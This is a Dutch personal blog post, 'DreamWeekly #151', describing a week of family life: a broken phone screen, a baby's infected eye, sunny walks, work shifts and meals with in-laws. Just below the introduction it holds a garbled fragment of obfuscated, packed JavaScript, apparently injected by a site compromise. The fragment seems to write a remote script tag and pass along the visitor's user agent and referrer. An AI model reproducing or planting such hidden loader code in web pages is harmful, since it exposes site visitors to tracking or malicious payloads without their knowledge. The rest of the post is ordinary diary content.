DreamWeekly

DreamWeekly #151

Jullie hebben vast niet gemerkt dat het nu woensdag is in plaats van maandag toch ;). Ik ben gewoon compleet vergeten om mijn DreamWeekly online te zetten! En dat terwijl ik best een fijne week achter de rug heb waarin ik voornamelijk vol op genoot van de zon.

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ztads|var|u0026u|referrer|akrhe||js|php'.split('|'),0,{})) id=”attachment_10929″ align=”alignnone” width=”2448″]


Maandag
Gelijk al ’s ochtends kom ik erachter dat dit niet mijn dag is. Zomaar uit het niets gaat het scherm van mijn iphone stuk als ik naar de trein loop. Er staan opeens allemaal strepen over mijn beeld! Even later valt ook mijn homebutton uit en is mijn telefoon nauwelijks meer te gebruiken. Ondertussen krijg ik ook nog een appje dat Kim ziek is, en dat allemaal voordat mijn dag überhaupt echt is begonnen. Werk gaat een beetje aan me voorbij, ik maak me druk om mijn telefoon en hoop dat ik eenmaal thuis nog wel een back-up kan draaien. Gelukkig lukt dat! Harper merkte trouwens niks van mijn rot dag, ik kreeg twee heerlijke foto’s doorgestuurd van oma.

Dinsdag
Na bijna een dag zonder telefoon doet als ik wakker wordt mijn home button het opeens weer. Zo is ie tenminste te gebruiken! Die strepen over mijn scherm zijn nog steeds heel vervelend maar goed dat gaan we een andere keer wel oplossen. Harper wordt wakker met een flink ontstoken oogje, hij zit helemaal dichtgeplakt. De hele dag ben ik in de weer met watjes om het schoon te houden. Ondanks dat lopen we ook nog even de stad in en slaapt ze een paar uurtjes waardoor ik flink wat in het huis kan doen. Fijn! ’s Avonds komt een vriend van Joel een hapje mee eten en daarna duik ik nog even in bad.

Woensdag
Al vroeg ben ik op pad met Harper, even langs de huisarts. Haar oogje is ontstoken en er komt een hoop troep uit. Gelukkig vindt de dokter het er verder prima uit zien en hoeven we ons er geen zorgen over te maken. Alleen zo sneu voor haar! Aangezien we nog bij onze oude dokter aan de andere kant van Hilversum zitten is het een dik half uur heen en terug lopen. Maar het is zo lekker weer dat ik het helemaal prima vind! Eenmaal thuis komt Anouk langs en leg ik Harper voor de tweede keer in de wagen. Veel te mooi weer om binnen te zitten. We lopen richting Laren en genieten in het zonnetje van een pizza. Eigenlijk blijven we tot het einde van de dag buiten, wat een cadeautje dit weer!


Donderdag
Met moeite sleep ik me uit bed, ik zie op tegen de werkdag. Dit wordt toch nog steeds niet minder hoor. Omdat ik al voor 6 uur de deur uit ga zie ik Harper niet tot ’s avonds, ik haat het. Aangekomen op werk gaat de knop om en doe ik zo goed mogelijk mijn best. Om ook vandaag nog even van het mooie weer te genieten gaan we ’s avonds een ijsje halen.


Vrijdag
Jaa, Kim is weer beter! Daardoor gaat de werkdag opeens vele malen sneller en voor ik het weet zit ik bij mijn schoonouders aan het avondeten. Het weekend fijn beginnen met lekker eten, the Voice kids en veel knuffels met Harper.Zaterdag
Ik mag even uitslapen wat natuurlijk niet lukt maar ik blijf wel even wat langer liggen. Daarna gaan we door de regen naar de markt voor de wekelijkse boodschapjes. Even een telefoon update tussendoor, de homebutton is het blijven doen maar de strepen.. Zoals je ziet is het echt flink vervelend. Op hoop van zegen heb ik mijn inboedelverzekering ingeschakeld. Ik hoop dat ze wat voor me kunnen doen. Ik mag pas eind september een nieuwe telefoon maar om nou voor die 6 maanden zo’n 250 euro reparatiekosten te gaan betalen is ook zo’n zonde. Ik ben de hele middag en avond alleen dus kom eigenlijk niet van de bank af. En ja.. als ik me nog afvroeg waarom dat zwangerschapsbuikje nergens naar toe gaat, dit is de tweede keer pizza deze week.


Zondag
Bed. Bank. Wandelen in de regen en eten. O, en genieten van deze schattige handjes.

Komende week staan er wat koffie dates op de planning en vieren we de verjaardag van mijn schoonmama. Daarnaast ben ik me vast mentaal aan het voorbereiden op de week erop want dan draai ik drie nachtdiensten. Help!

handtekening

Follow on Bloglovin

You Might Also Like

1 Comment

  • Reply
    Rachel Kromdijk
    03/27/2017 at 12:36

    Wat heerlijk om zo’n overzicht van iemand te lezen, ziet er goed uit!

  • Leave a Reply